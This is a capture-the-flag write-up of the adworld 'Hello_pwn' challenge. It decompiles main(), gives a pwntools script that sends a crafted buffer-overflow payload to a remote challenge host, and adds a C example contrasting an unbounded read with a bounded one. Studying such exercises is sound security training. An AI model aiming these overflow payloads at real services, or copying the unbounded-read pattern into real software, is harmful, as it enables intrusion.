攻防世界 (adworld) Hello_pwn PWN

First check the binary's protections with checksec: only NX is enabled.

[*] '\hellopwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Load it into IDA and decompile main().

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~     ");
  puts("lets get helloworld for bof");
  read(0, &unk_601068, 0x10uLL);
  if ( dword_60106C == 1853186401 )
    sub_400686();
  return 0LL;
}

So read() accepts up to 0x10 bytes into 601068, and main() then compares the dword at 60106C, which lies 4 bytes after the start of that buffer, with 1853186401.

Exploit the overflow in read(): the bytes beyond the first 4 land in dword_60106C, so supplying the expected value there makes main() call sub_400686().

from pwn import *

p = remote("61.147.171.105", 64116)

# read() takes 0x10 bytes at 0x601068; the compared dword is 4 bytes further
# on at 0x60106C, so 4 filler bytes are followed by 1853186401 packed
# little-endian by p64() (12 bytes in total, within the 0x10 limit).
payload = b'O' * 4 + p64(1853186401)

# pwntools tubes expect bytes for both the delimiter and the data
p.sendlineafter(b'lets get helloworld for bof', payload)
p.interactive()
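To show the mechanism from the defensive side, here is an added example that is not part of the write-up and not the challenge binary's source: a C model of the .bss layout IDA shows (a 4-byte buffer immediately followed by the compared dword), with the unbounded read() pattern placed next to a bounded one. The struct, the function names, the trailing slack bytes and the constructed input are assumptions of this example.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Model of the layout IDA shows at 0x601068 (constructed, not the real
 * binary): a 4-byte buffer, then the 4-byte dword main() compares, then
 * 8 bytes of slack standing in for whatever follows in .bss so that a
 * 0x10-byte copy stays inside this object. */
struct bss_layout {
    char    buf[4];     /* unk_601068 */
    int32_t flag;       /* dword_60106C */
    char    slack[8];   /* remaining bytes of the 0x10-byte read window */
};

#define MAGIC 1853186401   /* 0x6E756161, the value main() compares against */

/* Vulnerable pattern: up to 0x10 bytes are copied starting at buf, exactly
 * like read(0, &unk_601068, 0x10). Returns 1 when the comparison succeeds,
 * i.e. when sub_400686() would be called. */
int vulnerable_read(const unsigned char *input, size_t len) {
    struct bss_layout mem;
    memset(&mem, 0, sizeof mem);
    if (len > 0x10)
        len = 0x10;
    memcpy(&mem, input, len);   /* byte 4 onward overwrites mem.flag */
    return mem.flag == MAGIC;
}

/* Hardened pattern: the copy length is bounded by the destination buffer,
 * so attacker-controlled input can never reach mem.flag. */
int bounded_read(const unsigned char *input, size_t len) {
    struct bss_layout mem;
    memset(&mem, 0, sizeof mem);
    if (len > sizeof mem.buf)
        len = sizeof mem.buf;
    memcpy(mem.buf, input, len);
    return mem.flag == MAGIC;
}

/* Builds the 12-byte input the write-up sends: 4 filler bytes, then the
 * magic value as 8 little-endian bytes (what pwntools' p64 produces).
 * Returns the number of bytes written into out (at least 12 available). */
size_t build_input(unsigned char *out) {
    uint64_t v = MAGIC;
    memset(out, 'O', 4);
    memcpy(out + 4, &v, 8);     /* little-endian on x86-64 */
    return 12;
}

int main(void) {
    unsigned char in[16];
    size_t n = build_input(in);
    printf("unbounded read reaches check: %d\n", vulnerable_read(in, n));
    printf("bounded read reaches check:   %d\n", bounded_read(in, n));
    return 0;
}
```

Running it shows the same 12 bytes flipping the comparison in the unbounded version and doing nothing in the bounded one; the only difference between the two functions is whether the copy length is tied to the destination size, which is the fix a code review would ask for.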
posted @ 2024-04-11 12:55  monyhzc